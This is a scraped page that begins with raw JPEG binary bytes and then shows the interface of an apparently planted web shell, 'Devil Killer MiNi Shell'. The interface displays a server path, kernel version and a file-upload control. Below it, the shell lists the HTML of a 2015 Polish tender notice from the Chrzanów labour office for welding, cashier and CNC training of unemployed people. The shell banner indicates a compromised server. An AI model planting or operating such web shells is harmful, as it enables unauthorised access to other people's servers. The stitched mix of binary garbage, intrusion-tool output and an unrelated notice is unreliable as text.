JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150916/242178-N-2015.html

<p class="kh_header"><b>Chrzanów: Przeprowadzenie szkoleń grupowych  dla: osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Chrzanowie.</b><br>
<b>Numer ogłoszenia: 242178 - 2015; data zamieszczenia: 16.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Chrzanowie , ul. Słowackiego 8, 32-500 Chrzanów, woj. małopolskie, tel. 032 7533800, faks 032 7533899.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-chrzanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń grupowych  dla: osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Chrzanowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  przeprowadzenie szkoleń grupowych  dla: osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Chrzanowie  w ramach środków finansowych z  Europejskiego Funduszu Społecznego 


 Zamówienie składa się z  3  części: 

Część 1.   Spawanie blach i rur spoinami pachwinowymi metodami MAG ( 135)  i TIG ( 141 )  :    - dla   10  osób,  planowany termin realizacji:   październik - listopad  2015r. 
Część 2.   Kasjer handlowy - dla 15 osób, planowany termin realizacji: listopad  2015.
Część  3.  Operator obrabiarek sterowanych numerycznie - CNC   - dla 10 osób, planowany termin realizacji:  listopad 2015r..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)Aktualny wpis do Rejestru Instytucji Szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej  zgodnie z Rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych Dz. U. Nr 236 poz. 2365) -  dot. wszystkich części zamówienia.

b)Atest Instytutu Spawalnictwa w Gliwicach uprawniający do szkolenia i egzaminowania spawaczy  - okres ważności atestu nie może być krótszy niż termin realizacji szkolenia  - dotyczy części  1  zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże się przeprowadzeniem z należytą starannością, co najmniej jednego szkolenia grupowego w  okresie ostatnich trzech lat ( dla min. 10 osób )  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie - o tematyce tożsamej z przedmiotem zamówienia załącznik nr 5 do SIWZ)  - stosownie do trzech części zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże,  iż  na czas realizacji zamówienia będzie dysponował  urządzeniami  adekwatnymi do danej  części zamówienia umożliwiającymi realizację szkolenia ( załącznik nr  10 do  SIWZ).

Na jednego  uczestnika  musi przypadać  jedno stanowisko  szkoleniowe wyposażone w  niezbędne narzędzia  i materiały . Każdy z uczestników szkolenia powinien  mieć indywidualny  dostęp do sprzętu  i materiałów wykorzystywanych przy realizacji szkolenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże,  iż  na czas realizacji zamówienia będzie dysponował osobą lub osobami, które posiadają adekwatne do zakresu szkolenia  kwalifikacje, wykształcenie,  doświadczenie zawodowe ( załącznik nr 11 do  SIWZ). 

Przynajmniej jeden z wykładowców musi posiadać wykształcenie wyższe kierunkowe oraz uprawnienia pedagogiczne i co najmniej roczne doświadczenie w prowadzeniu szkoleń o tematyce zgodnej z przedmiotem zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wymaga przedłożenia dokumentów dot. ww. warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie  Wykonawcy o spełnieniu warunków udziału w postępowaniu określonych  w  art. 22 ust. 1 ustawy PZP.
2. Pisemne oświadczenie o nie zaleganiu z opłacaniem podatków, opłat oraz składek na  ubezpieczenie zdrowotne  i społeczne stanowiące załącznik nr 9 niniejszej specyfikacji, przedstawione w formie oryginału i podpisane przez Wykonawcę lub inną osobę upoważnioną   do podpisania oferty</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany mogą dotyczyć:
a. zakresu  usług objętych umową,  w przypadku  zmian przepisów prawa w tym zakresie,
b.miejsca realizacji  świadczeń z  zastrzeżeniem, iż w przypadku przeprowadzenia zajęć poza miastem Chrzanów Wykonawca zapewni dowóz uczestnikom z Chrzanowa na miejsce odbywania zajęć i z powrotem,
c.kadry wykonującej przedmiot zamówienia z przyczyn losowych ( za zgodą Zamawiającego ),
d.terminu przeprowadzenia szkolenia  
e. zmiana  kosztów szkolenia jeżeli te zmiany są korzystne dla  Zamawiającego,
f.zmiana kosztu osobogodziny jeżeli  ta  zmiana jest  korzystna dla  Zamawiającego
g.zmiany w harmonogramie zajęć pod warunkiem zachowania terminu realizacji umowy określonego  w  § 5  umowy szkoleniowej oraz tego  że  plan nauczania będzie obejmował przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu. Termin realizacji zamówienia może ulec zmianie tylko w szczególnie uzasadnionych przypadkach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-chrzanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Chrzanowie, ul. Słowackiego 8, 32-500 Chrzanów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2015 godzina 08:30, miejsce: Powiatowy Urząd Pracy w Chrzanowie, ul. Słowackiego 8, 32-500 Chrzanów, dziennik podawczy, parter..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt:  Aktywizacja osób młodych pozostających bez pracy w powiecie chrzanowskim ( I )  realizowanym w ramach Programu Operacyjnego  Wiedza Edukacja Rozwój, Priorytet I:  Osoby młode na rynku pracy, Działanie 1.1  Wsparcie osób młodych pozostających bez pracy na regionalnym rynku pracy, 
Poddziałanie 1.1.2: Wsparcie udzielane z Inicjatywy na rzecz zatrudnienia ludzi młodych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Spawanie blach i rur spoinami pachwinowymi metodami MAG ( 135)  i TIG ( 141 ) :.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia: przeprowadzenie szkolenia dla  10  osób w specjalności: Spawanie blach i rur spoinami pachwinowymi metodami MAG ( 135)  i TIG ( 141 ) :     

2.  Miejsce organizacji szkolenia:  powiat chrzanowski.

W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem ( wynajętym środkiem komunikacji zbiorowej ). Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia tj. w poz. nr 8 załączniku nr 7 do SIWZ).  

3. Program szkolenia powinien obejmować min. 230 godzin dydaktycznych i być zgodny z wytycznymi Instytutu Spawalnictwa w Gliwicach. 

W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych  dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.

Program powinien zawierać wskazane powyżej  minimum programowe , które może zostać poszerzone 
o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia

4.	Sposób organizacji zajęć praktycznych;

a)zajęcia praktyczne mają być przeprowadzone zgodnie z wytycznymi Instytutu Spawalnictwa w Gliwicach.
b)Wykonawca zapewnia odzież roboczą.
c)  Wykonawca zabezpiecza sprzęt techniczny oraz materiały do zajęć praktycznych., każdy uczestnik ma mieć zapewniony indywidualny dostęp do stanowiska spawalniczego wyposażonego w odpowiedni sprzęt i materiały niezbędne do prawidłowego przeprowadzenia zajęć praktycznych

5. Czas trwania:  nie dłużej niż 35  kolejnych dni roboczych  


6. Termin realizacji szkolenia:  październik - listopad 2015r.

Dokładny  termin  realizacji zostanie  określony w umowie szkoleniowej. 

7. Inne postanowienia:
Każdy uczestnik po pozytywnym zdaniu egzaminu otrzyma:
1)	Zaświadczenie wystawione na papierze firmowym zgodnie  z wymogami określonymi w § 71 ust. 4 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 maja 2014 r. w sprawie szczegółowych warunków oraz trybu i sposobów prowadzenia usług rynku pracy ( Dz. U. z 2014 r. poz. 667),
2)	Zaświadczenie na druku MEN jeśli instytucja posiada możliwość jego wystawienia. 
3) Po pozytywnym zaliczeniu egzaminu uczestnicy otrzymają także Świadectwo Egzaminu Kwalifikacyjnego Spawacza wystawionego przez Instytut Spawalnictwa oraz Książeczkę Spawacza..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Posiadanie przez wykonawcę certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kasjer handlowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia: przeprowadzenie szkolenia dla  15  osób bezrobotnych  w specjalności:  Kasjer handlowy.  

2. Miejsce organizacji szkolenia:  powiat chrzanowski.

W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia ( wynajętym środkiem transportu zbiorowego ) z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby
 i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia tj. w poz. nr 9 załączniku nr 7 do SIWZ).  

3. Program szkolenia powinien obejmować 30  godzin dydaktycznych i zawierać następujące moduły
a)	Podstawowe zagadnienia z zakresu podatku VAT
b)	Kasa fiskalna jako element fiskalizacji w handlu i usługach, typy kas i ich działanie, materiały eksploatacyjne
c)	Zajęcia praktyczne
d)	Zasady bezpieczeństwa w obrocie produktami żywnościowymi  i przestrzegania zasad higieny  
w procesie produkcji
e)	Podstawowe zasady higieny ( HACCP )

Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż 50%. 

W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.

Program powinien zawierać wskazane powyżej minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia, jednak ogólna liczba godzin nie  może przekroczyć 30. 

4. Sposób organizacji zajęć praktycznych
a.zajęcia praktyczne powinny stanowić min. 50 % ogólnej liczby godzin objętych programem.  
b. w ramach zajęć praktycznych uczestnik powinien nabyć umiejętność obsługi kasy fiskalnej oraz terminali płatniczych. 
c. w ramach zajęć praktycznych wykonawca musi zapewnić liczbę kas fiskalnych co najmniej równą liczbie uczestników ( na jedną kasę może przypadać tylko jeden uczestnik). 
d. Wykonawca zabezpiecza sprzęt techniczny oraz materiały do zajęć praktycznych. Każdy uczestnik musi mieć zapewniony indywidualny dostęp do kasy fiskalnej. 

5. Czas trwania: nie dłużej niż 5 kolejnych  dni roboczych.

6.Termin realizacji szkolenia:  listopad 2015r. 

7. Inne postanowienia:

Każdy uczestnik po pozytywnym zdaniu egzaminu otrzyma;
a) Zaświadczenie wystawione na papierze firmowym zgodnie  z wymogami określonymi w § 71 ust. 4 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 maja 2014 r. w sprawie szczegółowych warunków oraz trybu i sposobów prowadzenia usług rynku pracy ( Dz. U. z 2014 r. poz. 667),
b)  Zaświadczenie na druku MEN jeśli instytucja posiada możliwość jego wystawienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.09-.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Posiadanie przez wykonawcę certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Operator obrabiarek sterowanych numerycznie - CNC.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia: przeprowadzenie szkolenia dla  10  osób w specjalności: Operator obrabiarek sterowanych numerycznie - CNC. 

2.  Miejsce organizacji szkolenia: preferowany powiat chrzanowski jednak w odległości nie większej niż 30 km od miasta Chrzanów.

W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia ( wynajętym środkiem transportu zbiorowego ) z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia tj. w poz. nr 9 załączniku nr 7 
do SIWZ).  

3. Program szkolenia:  musi  obejmować 120 godz. dydaktycznych i zawierać następujące moduły: 
1)	Podstawy rysunku technicznego.
2)	Technologia ogólna
3)	Podstawy maszynoznawstwa
4)	Technologia obróbki skrawaniem
5)	Zajęcia praktyczne:
a)	Planowanie obróbki przedmiotu
b)	Pisanie programów obróbki z uwzględnieniem komputerowego sterowania obrabiarek
c)	Przenoszenie programów roboczych z komputera na maszynę
d)	Uruchamianie obróbki
e)	Analiza parametrów obróbki i czasu pracy maszyny.
Program powinien zawierać wskazane powyżej minimum programowe , które może zostać poszerzone  o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia, jednak liczba godzin nie może przekroczyć  120. 

4. Czas trwania:    nie dłużej niż  20  kolejnych  dni roboczych 

5.  Termin realizacji szkolenia:  listopad  2015r.

6. Sposób realizacji szkolenia: 

a.	Wykonawca zapewnia liczbę komputerów co najmniej równą liczbie uczestników ( na jedno stanowisko komputerowe przypada tylko jeden uczestnik ).
b.	Liczba godzin praktycznych nie może być mniejsza niż 50% ogólnej liczby godzin przewidzianych programem.

Dokładny  termin  realizacji zostanie  określony w umowie szkoleniowej. 

